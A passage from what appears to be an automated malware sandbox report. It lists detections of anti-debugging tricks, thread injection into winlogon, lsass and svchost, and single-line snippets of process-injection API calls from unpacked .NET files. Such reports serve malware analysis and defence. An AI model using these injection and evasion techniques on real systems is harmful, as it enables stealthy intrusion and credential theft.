Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.drBinary or memory string: VMwareVirtual disk2.06000c29c2bea38880a8a16ee9f37bec9PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_38-15505
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_38-15663
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC4084B0
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC401E3C LoadLibraryA,GetProcAddress,SleepEx,17_2_00000253FC401E3C
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40F440 GetProcessHeap,17_2_00000253FC40F440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC408814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00000253FC408814
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC4084B0
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC40CD80
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC438814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00000253FC438814
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC4384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC4384B0
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000253FC43CD80
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002A5AF36CD80
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF368814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_000002A5AF368814
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF3684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002A5AF3684B0
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_000001780DD28814
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_000001780DD2CD80
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_000001780DD284B0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000020175EBCD80
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EB84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000020175EB84B0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EB8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_0000020175EB8814
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000020175EECD80
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000020175EE84B0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_0000020175EE8814
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_000002D0165E8814
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002D0165E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002D0165ECD80
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D016618814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_000002D016618814
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0166184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002D0166184B0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002D01661CD80

HIPS / PFW / Operating System Protection Evasion

barindex
.NET source code contains process injector
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1b4b4d149e8.12.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1b4bd200000.16.raw.unpack, RunPE.cs.Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,38_2_0000000140002434
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 3000000
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 16582EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 16582EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: 5B042EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FD62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CA6E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: 5B012EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FD62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CA6E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EDE62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: ED7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A19B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 95FB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A1982EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 95FB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 670F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4A4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 19A42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 670C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4A4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 19A42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D2662EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D1FC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDCC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDC92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D9542EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D2C72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D8FC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D2C72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CE6E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CE6B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AF662EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AEFD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: B6972EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A22A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25AA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A2F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ABA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F03D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF3C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBEB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A7DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0F52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA802EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CE892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5BB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEB72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8EB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 569B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8FE62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3DC22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 99B22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 984F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 81BB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE442EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1D0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: B6942EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 86A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1E52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A22A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2002EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25AA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 155B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A2F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43E52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6F82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ABA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68252EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F03D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 452E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF3C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27D22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBEB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5BE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B07C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A7DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F662EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AE502EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0F52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B9F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA802EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CE892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5BB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 39DF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEB72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9662EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 325C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8EB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEC32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 569B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C91C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8FE62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3DC22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 99B22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 984F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 81BB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE442EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1D0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 86A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1E52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2002EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 155B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43E52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6F82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68252EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 452E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27D22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5BE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B07C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F662EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AE502EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B9F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 39DF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9662EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 325C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEC32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C91C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA25AC
